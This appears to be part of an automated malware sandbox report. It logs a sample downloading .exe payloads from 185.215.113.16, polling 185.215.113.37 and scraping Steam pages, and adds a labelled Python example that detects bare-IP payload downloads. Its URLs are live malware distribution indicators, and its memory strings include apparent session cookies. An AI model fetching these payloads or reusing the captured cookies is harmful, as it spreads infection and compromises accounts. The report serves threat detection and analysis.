Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16 (3 identical entries collapsed into one)
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache (9 identical entries collapsed into one)
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive (29 identical entries collapsed into one; this is Firefox's built-in captive-portal probe issued by the firefox.exe process, not a request made by the sample's own code)
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache (28 identical entries collapsed into one; same Firefox captive-portal probe as above)
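The repeated TCP connections to 185.215.113.16 that no DNS lookup preceded, and the GET requests for .exe payloads with a literal IP in the Host header (several carrying no User-Agent at all), are the traffic shape the Suricata downloader rules listed above fire on. The block below is an added example, not part of the report and not Joe Sandbox or Suricata code: it correlates a DNS log with connection and HTTP logs, lists public destinations that were never resolved, and flags requests that combine a literal-IP host, an .exe path, a missing User-Agent and no DNS answer. The log lines are constructed for the example in a key=value style; the addresses 185.215.113.16, 185.215.113.37 and 104.21.53.8 appear in the report, but pairing 104.21.53.8 with steamcommunity.com and using 203.0.113.10 for detectportal.firefox.com are assumptions, not facts from the report.

```python
import ipaddress
import re
from typing import Dict, List, Set

# Constructed sample logs in a key=value style (not taken from the report).
# 185.215.113.16/.37 and 104.21.53.8 appear in the report; mapping 104.21.53.8 to
# steamcommunity.com and 203.0.113.10 to detectportal.firefox.com is assumed.
DNS_LOG = [
    "ts=1 query=steamcommunity.com answer=104.21.53.8",
    "ts=2 query=detectportal.firefox.com answer=203.0.113.10",
]
CONN_LOG = [
    "ts=3 src=192.168.2.7 dst=104.21.53.8 dport=443",
    "ts=4 src=192.168.2.7 dst=185.215.113.16 dport=80",
    "ts=5 src=192.168.2.7 dst=185.215.113.37 dport=80",
    "ts=6 src=192.168.2.7 dst=203.0.113.10 dport=80",
]
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
HTTP_LOG = [
    'ts=4 dst=185.215.113.16 host=185.215.113.16 method=GET uri=/luma/random.exe ua=""',
    f'ts=4 dst=185.215.113.16 host=185.215.113.16 method=GET uri=/off/def.exe ua="{CHROME_UA}"',
    'ts=5 dst=185.215.113.37 host=185.215.113.37 method=GET uri=/ ua=""',
    'ts=6 dst=203.0.113.10 host=detectportal.firefox.com method=GET uri=/success.txt?ipv4 '
    'ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"',
]

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
EXE_RE = re.compile(r"\.exe(?:\?|$)", re.IGNORECASE)


def parse_kv(line: str) -> Dict[str, str]:
    """Split a key=value log line; quoted values may contain spaces."""
    return {key: value.strip('"') for key, value in KV_RE.findall(line)}


def resolved_addresses(dns_log: List[str]) -> Set[str]:
    """Every address some DNS answer returned during the capture."""
    return {parse_kv(line)["answer"] for line in dns_log if "answer=" in line}


def connections_without_dns(conn_log: List[str], dns_log: List[str]) -> List[str]:
    """Public destinations contacted although no DNS answer ever pointed at them
    (the 'TCP traffic detected without corresponding DNS query' indicator)."""
    resolved = resolved_addresses(dns_log)
    hits = set()
    for line in conn_log:
        dst = parse_kv(line)["dst"]
        if dst not in resolved and ipaddress.ip_address(dst).is_global:
            hits.add(dst)
    return sorted(hits)


def is_literal_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def download_indicators(rec: Dict[str, str], resolved: Set[str]) -> List[str]:
    """Independent signals that a request looks like a bare-IP payload fetch."""
    reasons = []
    if is_literal_ip(rec.get("host", "")):
        reasons.append("host-is-literal-ip")
    if EXE_RE.search(rec.get("uri", "")):
        reasons.append("exe-download")
    if rec.get("ua", "") == "":
        reasons.append("no-user-agent")
    if rec.get("dst", "") not in resolved:
        reasons.append("no-dns")
    return reasons


def flag_downloads(http_log: List[str], dns_log: List[str], min_reasons: int = 2) -> List[dict]:
    """Requests carrying at least min_reasons of the indicators above; a normal
    browser request to a resolved hostname with a User-Agent scores zero."""
    resolved = resolved_addresses(dns_log)
    flagged = []
    for line in http_log:
        rec = parse_kv(line)
        reasons = download_indicators(rec, resolved)
        if len(reasons) >= min_reasons:
            flagged.append({"host": rec["host"], "uri": rec["uri"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    print(connections_without_dns(CONN_LOG, DNS_LOG))
    for hit in flag_downloads(HTTP_LOG, DNS_LOG):
        print(hit)
```

The threshold of two indicators keeps the Firefox captive-portal probes out of the result set while still catching the bare GET / polling of 185.215.113.37, which has no .exe in its path but combines a literal-IP host, an empty User-Agent and no DNS resolution.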
Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlUpdateService:_postUpdateProcessing - status is pending-elevate, but this is a silent startup, so the elevation window has been suppressed.You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/MAX(EXISTS( equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://*.imgur.com/js/vendor.*.bundle.js@mozilla.org/network/atomic-file-output-stream;1resource://gre/modules/FileUtils.sys.mjs*://track.adform.net/serving/scripts/trackpoint/FileUtils_openAtomicFileOutputStream*://www.rva311.com/static/js/main.*.chunk.js@mozilla.org/network/safe-file-output-stream;1*://www.everestjs.net/static/st.v3.js**://pub.doubleverify.com/signals/pub.js*@mozilla.org/network/file-output-stream;1*://static.chartbeat.com/js/chartbeat.jsresource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter%40mozilla.org:1.5.1FileUtils_closeSafeFileOutputStream*://cdn.branch.io/branch-latest.min.js**://c.amazon-adsystem.com/aax2/apstag.jshttps://smartblock.firefox.etp/facebook.svg*://static.chartbeat.com/js/chartbeat_video.js*://static.criteo.net/js/ld/publishertag.js*://*.imgur.io/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.js*://auth.9c9media.ca/auth/main.js*://www.google-analytics.com/analytics.js**://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagservices.com/tag/js/gpt.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://s0.2mdn.net/instream/html5/ima3.js*://cdn.adsafeprotected.com/iasPET.1.js*://static.adsafeprotected.com/iasPET.1.js*://www.google-analytics.com/gtm/js**://adservex.media.net/videoAds.js**://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://ssl.google-analytics.com/ga.js*://s.webtrends.com/js/advancedLinkTracking.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://securepubads.g.doubleclick.net/gampad/*ad-blk**://securepubads.g.doubleclick.net/gampad/*xml_vmap1*https://static.adsafeprotected.com/firefox-etp-pixel*://id.rambler.ru/rambler-id-helper/auth_events.jshttps://static.adsafeprotected.com/firefox-etp-jscolor-mix(in srgb, currentColor 14%, transparent)*://media.richrelevance.com/rrserver/js/1.2/p13n.js*://www.gstatic.com/firebasejs/*/firebase-messaging.js*resource://gre/modules/ExtensionScriptingStore.sys.mjs equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.c3a9 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2303891585.000001C96F71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2300171636.000001C96F503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2229257788.000001C968F3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C9679EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2229257788.000001C968FAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=7b60d4c5eefaf9e8532fcfae; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 02:02:09 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeUpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyRestartOnLastWindowClosed.#maybeRestartBrowser - Unexpectedly attempted to restart when RestartOnLastWindowClosed ought to be disabled! (not restarting)moz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/messaging_helper.jsTrue if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]moz-extension://2aec2d48-9127-47e3-8a78-71ba3773e451/selector/callBackground.jsmoz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeUpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyRestartOnLastWindowClosed.#maybeRestartBrowser - Unexpectedly attempted to restart when RestartOnLastWindowClosed ought to be disabled! (not restarting)moz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/messaging_helper.jsTrue if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]moz-extension://2aec2d48-9127-47e3-8a78-71ba3773e451/selector/callBackground.jsmoz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeUpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyRestartOnLastWindowClosed.#maybeRestartBrowser - Unexpectedly attempted to restart when RestartOnLastWindowClosed ought to be disabled! (not restarting)moz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/messaging_helper.jsTrue if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]moz-extension://2aec2d48-9127-47e3-8a78-71ba3773e451/selector/callBackground.jsmoz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963461000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
